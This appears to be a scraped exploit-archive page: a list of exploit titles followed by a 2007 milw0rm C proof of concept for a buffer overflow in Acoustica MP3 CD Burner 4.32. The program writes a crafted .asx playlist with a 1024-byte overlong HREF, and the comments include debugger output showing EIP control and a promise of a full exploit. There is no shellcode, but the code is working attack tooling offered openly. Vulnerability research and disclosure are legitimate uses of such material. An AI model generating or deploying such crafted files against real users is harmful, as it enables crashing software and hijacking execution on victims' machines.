477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
99 lines
4.2 KiB
C++
Executable file
99 lines
4.2 KiB
C++
Executable file
/*
|
|
Credit's to n00b for finding this bug and poc..
|
|
Acoustica MP3 CD Burner 4.32 local buffer-overflow poc code.
|
|
Date : May 31'st 2007
|
|
Tested:On win xp sp 2.
|
|
|
|
Acoustica Is prone to a buffer-overflow when parasing a .asx playlist file
|
|
If you can entice some one to open a specialy crafted .asx play list file it
|
|
is possible to run shell-code.This issue occurs because the applications fail
|
|
to properly check boundaries on user-supplied data before copying it to an
|
|
insufficiently sized memory buffer.If we open it up in olly and pass the
|
|
specially crafted .asx we will see at first we can control the eax registers
|
|
also ecx gets overwritten if we pass exception the eip is over written .
|
|
I will try and write a loacal exploit in a few day's.
|
|
|
|
...\\Debug-info//...
|
|
////////////////////////////////////////////////////////////////////////////////
|
|
/1.exception
|
|
/(63c.3d8): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
eax=41414141 ebx=00127273 ecx=41414141 edx=7fffffff esi=7ffffffe edi=00000800
|
|
eip=003392f5 esp=00125f2c ebp=00126184 iopl=0 nv up ei pl nz na pe nc
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
|
|
UpdateAllMasterChunks+0x4155: cmp byte ptr [eax],0 ds:0023:41414141=??
|
|
////////////////////////////////////////////////////////////////////////////////
|
|
//Eax and ecx are over-wrote with our user suplied data.
|
|
////////////////////////////////////////////////////////////////////////////////
|
|
/2.exception
|
|
/(63c.3d8): Access violation - code c0000005 (first chance)
|
|
First chance exceptions are reported before any exception handling.
|
|
This exception may be expected and handled.
|
|
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000
|
|
eip=41414141 esp=00125b5c ebp=00125b7c iopl=0 nv up ei pl zr na pe nc
|
|
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
|
|
41414141 ?? ???
|
|
////////////////////////////////////////////////////////////////////////////////
|
|
/As we can see after passing execution to the program we can control the eip.
|
|
/we have 4bytes to write to any-where we like. ***to be continued**
|
|
////////////////////////////////////////////////////////////////////////////////
|
|
|
|
Also 1 more thing .m3u file's are also exploitable but this is a different poc
|
|
As .m3u file's we dont control the eip but we do control a few register's.
|
|
*/
|
|
|
|
#include <stdlib.h>
|
|
#include <stdio.h>
|
|
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
FILE *asx;
|
|
|
|
|
|
if(argc < 2) {
|
|
|
|
system("cls");
|
|
printf("\n *************************************************");
|
|
printf("\n *************************************************");
|
|
printf("\n * Acoustica MP3 CD Burner 0day poc *");
|
|
printf("\n *************************************************");
|
|
printf("\n * Special thanks to Str0ke *");
|
|
printf("\n *************************************************");
|
|
printf("\n *Shout's ~ str0ke ~ c0ntex ~ marsu ~ v9@fakehalo*");
|
|
printf("\n *Date : May 31'st 2007 *");
|
|
printf("\n *************************************************");
|
|
printf("\n * Credit's to n00b for finding this bug and poc *");
|
|
printf("\n *************************************************");
|
|
printf("\n Usage:> Exploit.asx ");
|
|
printf("\n *************************************************");
|
|
|
|
return 0;
|
|
}
|
|
|
|
if(!(asx = fopen(argv[1], "w"))) {
|
|
printf("[+] Error");
|
|
return 0;
|
|
}
|
|
fputs("<ASX VERSION=\x22\x33\x2E\x30\x22\x3E\n", asx);
|
|
fputs("<ENTRY>\n",asx);
|
|
fputs("<TITLE>Acoustica MP3 CD Burner Bof</TITLE>\n",asx);
|
|
fputs("<REF HREF=\x22",asx);
|
|
{
|
|
for (int i=0;i<512;i++) \
|
|
fputs("A", asx);
|
|
|
|
for (int i=0;i<512;i++) \
|
|
fputs("A", asx);
|
|
}
|
|
fputs(".asf\x22\x2F\x3E\n", asx);
|
|
fputs("</ENTRY>\n</ASX>\n", asx);
|
|
fclose(asx);
|
|
printf("File's successfully created");
|
|
printf("\nOpen with Acoustica MP3 CD Burner and eip will become 41414141");
|
|
printf("\nLocal exploit to be wrote in a few day's enjoy");
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2007-05-31]
|